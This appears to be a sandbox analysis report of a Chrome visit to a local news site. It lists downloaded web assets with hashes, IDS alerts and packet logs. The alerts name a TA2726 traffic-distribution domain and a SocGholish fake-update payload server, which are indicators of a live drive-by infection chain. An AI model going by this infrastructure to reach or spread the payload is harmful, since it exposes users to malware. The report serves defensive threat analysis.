                                                        Preview:@charset "UTF-8";:root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676;--wc-form-border-color:rgba(32, 7, 7, 0.8);--wc-form-border-radius:4px;--wc-form-border-width:1px}@keyframes spin{100%{transform:rotate(360deg)}}@font-face{font-family:star;src:url(../fonts/WooCommerce.woff2) format("woff2"),url(../fonts/WooCommerce.woff) format("woff"),url(../fonts/WooCommerce.ttf) format("truetype");font-weight:400;font-style:normal}@font-face{font-family:WooCommerce;src:url(../fonts/WooCommerce.woff2) format("woff2"),url(../fonts/WooCommerce.woff) format("woff"),url(../fonts/WooCommerce.ttf) format("truetype");font-weight:400;font-style:normal}.woocommerce form .form-row{padding:3px;margin:0 0 6px}.woocommerce form .form-row [placeholder]:focus::-webkit-input-placehol
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (13479)
                                                        Category:downloaded
                                                        Size (bytes):13577
                                                        Entropy (8bit):5.272065782731947
                                                        Encrypted:false
                                                        SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (18143), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):18143
                                                        Entropy (8bit):4.745101581200593
                                                        Encrypted:false
                                                        SSDEEP:384:c3sXkEzOm9Oq/tThyIeGe0cGAyB3gSpSgsVY8s:mGAyNh
                                                        MD5:F436463DE7C96408A776BDB79D0C5826
                                                        SHA1:EEBB672D778A9504749AF37C764E3FE33CC18184
                                                        SHA-256:474A2FA5DB3E1944354EA453E0DA699ED3327995A3A4FEC58186E7715F2E0D7A
                                                        SHA-512:B2F2A205306FEA06969B56204C81B3047FC945BCE48F91E604E0CCFCC6736620CB8B8DB701F5C8DC2E2D2D917BC03F1E72AEAD8DA80607D26CEFD6D7D831A1A9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=aab4a5
                                                        Preview::root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676;--wc-form-border-color:rgba(32, 7, 7, 0.8);--wc-form-border-radius:4px;--wc-form-border-width:1px}.woocommerce .woocommerce-error .button,.woocommerce .woocommerce-info .button,.woocommerce .woocommerce-message .button,.woocommerce-page .woocommerce-error .button,.woocommerce-page .woocommerce-info .button,.woocommerce-page .woocommerce-message .button{float:right}.woocommerce .col2-set,.woocommerce-page .col2-set{width:100%}.woocommerce .col2-set::after,.woocommerce .col2-set::before,.woocommerce-page .col2-set::after,.woocommerce-page .col2-set::before{content:" ";display:table}.woocommerce .col2-set::after,.woocommerce-page .col2-set::after{clear:both}.woocommerce .col2-set .col-1,.woocommerce-page .c
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):70
                                                        Entropy (8bit):4.479881418282092
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlE+tnMysyxt8KaZ1p:6v/lhPfZMysO8Zp
                                                        MD5:C0DDCC7CC2D334254808AE1D918F9EE7
                                                        SHA1:6EA24D025387CE247FA530F14778EF7ADA4683D5
                                                        SHA-256:67EBF650147A9122E94FF1B25A78A82E903B92B877821C1479DE69F00F59D429
                                                        SHA-512:73AF7C69EA68717A77638A0ACF15ADE570873FBA98FE1FC0FBD0C246B960AAC1E66406323E758CE7320DA6A11AB3487992E6CF5F160B96215FC278E6A288A138
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR....................IDAT..c...?........4....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 1451x2560, components 3
                                                        Category:downloaded
                                                        Size (bytes):954032
                                                        Entropy (8bit):7.958675148014824
                                                        Encrypted:false
                                                        SSDEEP:24576:aAtE30UgcnXZ9iAyXMNtFH3ArU4FuVmxXXmRmCtd:9E3FJBbtFQvFkmVXmjv
                                                        MD5:864F99E7963D3A5FFB106B3B01B7D50D
                                                        SHA1:F5589C51DB923EDDD97003DE961B0416E470640A
                                                        SHA-256:9600C1FB83EA5686646866C115725B643C7C041CDCD9D408A2858AEDE8509304
                                                        SHA-512:E9099677D79B9E59B047E44BCD0E023D057E73A27EE282453EFEF8B6A4B1DE4C62A7E8FB3267C4296AF6A10E8EB6DDB81D39B4A485AC631FB72D9E89E8096E6D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/03/dom-section-3-5-25-1-scaled.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (7910), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):7910
                                                        Entropy (8bit):5.22298994963621
                                                        Encrypted:false
                                                        SSDEEP:192:RrUDc4B6C+AuV4S+LPHNY8USmaQilNrE6tuVbjWch5YnW6oyuZpxbUGXoi0Vo/gZ:+DEC+Aw4S+LPHNY8USmaQiluHVXWch2N
                                                        MD5:44485BA80B677024C46C2B2387E450C8
                                                        SHA1:6D909F429ED8620AA33CF2BF4BA406149C94AFAE
                                                        SHA-256:D2014AA913E41FEC261461722B2883E2167FEDB739050CEC9F4BEAFAB3DDB7AB
                                                        SHA-512:6797A295FC54D0CA270C07584E0878BD485B60181787CA5C9189AD999286F5F4D98FFFE96BD05085BAE917110FAFEA3B54F6C0AA4DC0E31E9B30839CCAEBC3E8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.26.1
                                                        Preview:!function(e){var t="advads_procfp",a="advanced_ads_ad_clicks",d=null,n=null;function o(e){try{return JSON.parse(e)}catch(e){return null}}e(document).on("advads-passive-cb-conditions",(function(e,t){t.conditions.ad_clicks="check_ad_clicks",t.check_ad_clicks=function(e,t){if(advads.cookie_exists(a+"_"+t.id)){var d=advads.get_cookie(a+"_"+t.id);d=o(d)}if(d){var n=parseInt((new Date).getTime()/1e3);for(var i in d)if("_"+e.expiration==i&&d[i].ttl>=n&&d[i].count>=parseInt(e.limit))return!1}return!0}}));var i=function(){this.$elements={},this.currentIFrame=!1,this.focusLost=!1,this.wrappers=[".google-auto-placed"],this.attributes={"data-anchor-status":"displayed","data-vignette-loaded":"true"},this.lastClick=0,this.init()};i.prototype={constructor:i,init:function(){const t=this;let a;e(document).on("click","a[data-cfpa]",(function(){t.onClick(parseInt(e(this).attr("data-cfpa")))})),e(window).on("blur",(function(e){setTimeout((function(){if(!t.currentIFrame)for(let e=document.activeElement;e&&
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:downloaded
                                                        Size (bytes):144465
                                                        Entropy (8bit):7.976195874013586
                                                        Encrypted:false
                                                        SSDEEP:3072:ppIMmPI+UFRyXWU8OCCKEdNHDSRUNus9Voo5ZqgmzYUDvjJ2Mf5:ppbmPIGmaCCKKNgUss3VAUUUMf5
                                                        MD5:1EFDA67FDB00B1C8232EE7EE3F97750F
                                                        SHA1:2D81807E6B2E5731840A49D29436C808BAE0500E
                                                        SHA-256:A0B2C5D679DAC7421F3C18754EFE469ADD32E02B6E6ACCD0F21C269792FFBE99
                                                        SHA-512:60AE307D9FE25000BA024C795895900FE44D5E862AEEB2C7BB66C40D9D60C1F9740CA5C908FE9CADDBCE7E6C61F6F7C57344FA4C74DB9DB8073530C893904CE0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/full-section-2-26-25-1_page-0001-750x536.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..=.c....}..@Y.E>..f.......X.+3.?*f_.Rg4..fn.......<K.#.......k.!..Tmv[.I.+........Wx..w*/?.cK.wS.s $......X.S..k..#[x~.^..&.....u6.|?..~.m.D..../....Y!96X.O..Nh'Ex..py..p...y.<.....7.Q..=k6.*..H.Q.^....H..y.%.q_1...+./..:jQ...*)....J.v.M.I.1 .c.....>*.z...$W....w..k...w(...Z.dp...v..@.Z..6s
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (681), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):681
                                                        Entropy (8bit):4.753789277428536
                                                        Encrypted:false
                                                        SSDEEP:12:DtsJjs2sisTsvLTXZksisVsvLjn/sishpsvL4EsisiOeusvLSsisiWXsvLUuF:DgLYbocw
                                                        MD5:D3F72A23A4659D7C807EF226A63D313A
                                                        SHA1:9CE54035AA58581CE6396A33765CB2F476F79A50
                                                        SHA-256:6400DC8B0E288909FA6CC5ABDB32A8C2F1A8F8EFEB93369AB9BF9378F5F50BD7
                                                        SHA-512:4FE8928D96277E0E54E4E16073FEB16E36C4B75FA3E585807412CE8C70FE73707540745A82653DF1114D4A68B80C5A4F6A3429A4950E3AA32F05A5F797D7C518
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/css/elementor-frontend.css?ver=1.0.0
                                                        Preview:@media screen and (min-width:1025px){.elementor-column-gap-default>.elementor-row,.elementor-row .elementor-column-gap-default .elementor-row{width:calc(100% + 20px);margin-left:-10px;margin-right:-10px}.elementor-row .elementor-column-gap-narrow .elementor-row{width:calc(100% + 10px);margin-left:-5px;margin-right:-5px}.elementor-row .elementor-column-gap-extended .elementor-row{width:calc(100% + 30px);margin-left:-15px;margin-right:-15px}.elementor-row .elementor-column-gap-wide .elementor-row{width:calc(100% + 40px);margin-left:-20px;margin-right:-20px}.elementor-row .elementor-column-gap-wider .elementor-row{width:calc(100% + 60px);margin-left:-30px;margin-right:-30px}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (53229)
                                                        Category:downloaded
                                                        Size (bytes):53269
                                                        Entropy (8bit):4.75447731484189
                                                        Encrypted:false
                                                        SSDEEP:384:lJvrJ9/vmyeUaEMoZ0qk0e/Rmsm5Cz9TfikvmGkvmCLldlRab2ksYrOk:lRLRdL2t7RglNK7svk
                                                        MD5:4F506205BCC683507CEBD23BE376B7BB
                                                        SHA1:02C84BAB95351436B6E9B703230FA55939C80B39
                                                        SHA-256:E57D779CA78CCAEBA427CAAD02796710CC04D789F6DA7C65A573B3F0BD179D08
                                                        SHA-512:F3D5095CC6E86DCDA963CEFAD8E84D210F8F63A64C08B564E78963A241E32EF6E3D0861C7FEFAA9EE49B5F77D58B37F69F26FCD45B86DB5671942298AE9CA632
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.27.6
                                                        Preview:/*! elementor - v3.27.0 - 18-02-2025 */..elementor-hidden{display:none}.elementor-visibility-hidden{visibility:hidden}.elementor-screen-only,.screen-reader-text,.screen-reader-text span,.ui-helper-hidden-accessible{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;top:-10000em;width:1px;clip:rect(0,0,0,0);border:0}.elementor-clearfix:after{clear:both;content:"";display:block;height:0;width:0}.e-logo-wrapper{background:var(--e-a-bg-logo);border-radius:50%;display:inline-block;line-height:1;padding:.75em}.e-logo-wrapper i{color:var(--e-a-color-logo);font-size:1em}.elementor *,.elementor :after,.elementor :before{box-sizing:border-box}.elementor a{box-shadow:none;text-decoration:none}.elementor hr{background-color:transparent;margin:0}.elementor img{border:none;border-radius:0;box-shadow:none;height:auto;max-width:100%}.elementor .elementor-widget:not(.elementor-widget-text-editor):not(.elementor-widget-theme-post-content) figure{margin:0}.elementor embed,.elementor ifram
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (4358)
                                                        Category:downloaded
                                                        Size (bytes):5520
                                                        Entropy (8bit):5.07877659735423
                                                        Encrypted:false
                                                        SSDEEP:96:PwSrH5hrG6Qpw1rIN2Bkqsu6B89w1y+7Y3qv5StcXyuC0r4oYeTnf49uVhWWTfju:PwSrq6Qpw1rI2k1u6i9woa3hSSCP9+XC
                                                        MD5:6823120876C9AFC8929418C9A6F8E343
                                                        SHA1:90B0ADB37D70FFEC5F9189C36BB0027C310C9502
                                                        SHA-256:B65B3DE1BC923B9355248A0D941A0EAEE15DFB9A6B8EADB51323A8DF6189DCD1
                                                        SHA-512:63D84226815C831245754ADB30040EE72DCF218D01F991A5619675374BBE3B706E3721D32F5120D9D27E500813E8214244992B3875B3A7E7E4BC7DED5201183A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/imagesloaded.min.js?ver=5.0.0
                                                        Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v5.0.0. * JavaScript is all like "You images are done yet or what?". * MIT License. */.!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,(function(){function t(){}let e=t.prototype;return e.on=function(t,e){if(!t||!e)return this;let i=this._events=this._events||{},s=i[t]=i[t]||[];return s.includes(e)||s.push(e),this},e.once=function(t,e){if(!t||!e)return this;this.on(t,e);let i=this._onceEvents=this._onceEvents||{};return(i[t]=i[t]||{})[e]=!0,this},e.off=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;let s=i.indexOf(e);return-1!=s&&i.splice(s,1),this},e.emitEvent=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;i=i.slice(0),e=e||[];let s=this._onceEvents&&this._onceEvents[t];for(let n of i){s&&s[n]&&(this.off(t,n),delete s[n]),n.apply(this,e)}return this},e.allOff=function(){return d
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (10073)
                                                        Category:downloaded
                                                        Size (bytes):125709
                                                        Entropy (8bit):5.188257173390539
                                                        Encrypted:false
                                                        SSDEEP:3072:OBCz5/UkAkumkwm9BANQ6hmxdWozHubaGc5jhOZNXk4:qNFwWBANdT
                                                        MD5:7BBB974059B77123E6390DD5A5FF1260
                                                        SHA1:7909317F642708BE04B96E792D00782EC564213E
                                                        SHA-256:CC986DEF17FAA84635AE06864990E43F23E8B1D874E0A879FCFCDD08458AFB81
                                                        SHA-512:33F2BD3192CD503BC5C7367AB211E18B09F61FD040B474D850EB8D2C537328D84008511988A1F5C96A29844724C76006E2CE983E5CE7D9E400E3B3C523D51925
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/category/eprint/
                                                        Preview:<!doctype html>. [if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->. [if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->. [if IE 8]> <html class="no-js lt-ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->. [if IE 9]> <html class="no-js lt-ie10" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->.<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=yes' />. <link rel="profile" href="http://gmpg.org/xfn/11" />. <link rel="pingback" href="" />. <title>ePrint &#8211; Moorefield Examiner</title>.<meta name='robots' content='max-image-preview:large' />..<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-int
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (9206)
                                                        Category:downloaded
                                                        Size (bytes):12942
                                                        Entropy (8bit):4.898679704562556
                                                        Encrypted:false
                                                        SSDEEP:96:uctc3bjY7BGKHxNDQUEr2xTul/JnJYNFvyadOoAPOO+yHW:78UtGKRNer2gkVv
                                                        MD5:49DB983E0920158742EBE0EEB6EACF4D
                                                        SHA1:A98D78E7E6AAE1B2F5E74BC4A940C0D85F1A90E1
                                                        SHA-256:7A496EFB662AF9B8DFBF494475880BABF324746F435F4F3B704F22D3755CD62E
                                                        SHA-512:0BD8C4533DD177C572FC5ED880512E47076CD284AF8346A6A2D45382EC63E963ACB9D7C3E402A9D1A6EDC05E258D357AC6618BD7EF80CD71654730EEBC494EF4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.7.1
                                                        Preview:@keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loading__animation{to{transform:translateX(100%)}}body.wc-block-product-gallery-modal-open,body.wc-modal--open{overflow:hidden}.wc-block-grid__products .wc-block-grid__product-image{display:block;position:relative;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image a{border:0;box-shadow:none;outline:0;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image img{height:auto;max-width:100%;width:100%}.wc-block-grid__products .wc-block-grid__product-image img[hidden]{display:none}.wc-block-grid__products .wc-block-grid__product-image img[alt=""]{border:1px solid #f2f2f2}.edit-post-visual-editor .editor-block-list__block .wc-block-grid__product-title,.editor-styles-wrapper .wc-block-grid__product-title,.wc-block-grid__product-title{color:inherit;display:block;font-family:inherit;font-size:in
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):203
                                                        Entropy (8bit):5.139523437629011
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                        No static file info

                                                        Download Network PCAP: filteredfull

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-03-11T19:02:31.727916+01002060106ET EXPLOIT_KIT Malicious TA2726 TDS Domain in DNS Lookup (apiexplorerzone .com)1192.168.2.4537371.1.1.153UDP
                                                        2025-03-11T19:02:31.728278+01002060106ET EXPLOIT_KIT Malicious TA2726 TDS Domain in DNS Lookup (apiexplorerzone .com)1192.168.2.4567771.1.1.153UDP
                                                        2025-03-11T19:02:38.103667+01002060107ET EXPLOIT_KIT Malicious TA2726 TDS Domain in TLS SNI (apiexplorerzone .com)1192.168.2.44974746.173.214.32443TCP
                                                        2025-03-11T19:03:24.908199+01002852900ETPRO EXPLOIT_KIT SocGholish Stage 3 Fake Update Payload M31185.76.79.50443192.168.2.449846TCP
                                                        • Total Packets: 1381
                                                        • 443 (HTTPS)
                                                        • 80 (HTTP)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 11, 2025 19:02:16.177270889 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:16.476650000 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:17.242280006 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:18.444386005 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:20.922039032 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:22.485805035 CET49726443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:02:22.485910892 CET44349726172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:02:22.486063004 CET49726443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:02:22.486409903 CET49726443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:02:22.486448050 CET44349726172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:02:23.449121952 CET4972880192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.449140072 CET4972780192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.453888893 CET8049728198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.453901052 CET8049727198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.453994036 CET4972880192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.454005003 CET4972780192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.466141939 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.466193914 CET44349729198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.466830015 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.467109919 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.467129946 CET44349729198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.829133034 CET4972780192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.829256058 CET4972880192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.829397917 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.829484940 CET49726443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:02:23.829917908 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.829955101 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.830342054 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.831547022 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.831559896 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.833950996 CET8049727198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.834064007 CET8049728198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:23.834136963 CET4972780192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.834139109 CET4972880192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:23.872375965 CET44349726172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:02:23.872375965 CET44349729198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:24.667040110 CET49678443192.168.2.420.189.173.27
                                                        Mar 11, 2025 19:02:24.981528997 CET49678443192.168.2.420.189.173.27
                                                        Mar 11, 2025 19:02:25.583204985 CET49678443192.168.2.420.189.173.27
                                                        Mar 11, 2025 19:02:25.730952024 CET49671443192.168.2.4204.79.197.203
                                                        Mar 11, 2025 19:02:25.772085905 CET44349726172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:02:25.772201061 CET49726443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:02:26.249718904 CET44349729198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.249878883 CET44349729198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.249895096 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.249984980 CET49729443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.346673965 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.347197056 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.347225904 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.348253965 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.348507881 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.349508047 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.349508047 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.349581003 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.402714014 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.402739048 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.431926012 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.432024956 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.432204962 CET44349731198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.432286024 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.432286024 CET49731443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.434073925 CET4973380192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.438821077 CET8049733198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.439101934 CET4973380192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.439101934 CET4973380192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:26.443785906 CET8049733198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:26.791104078 CET49678443192.168.2.420.189.173.27
                                                        Mar 11, 2025 19:02:27.398283005 CET8049733198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:02:27.400886059 CET49735443192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:02:27.400924921 CET44349735198.12.251.68192.168.2.4
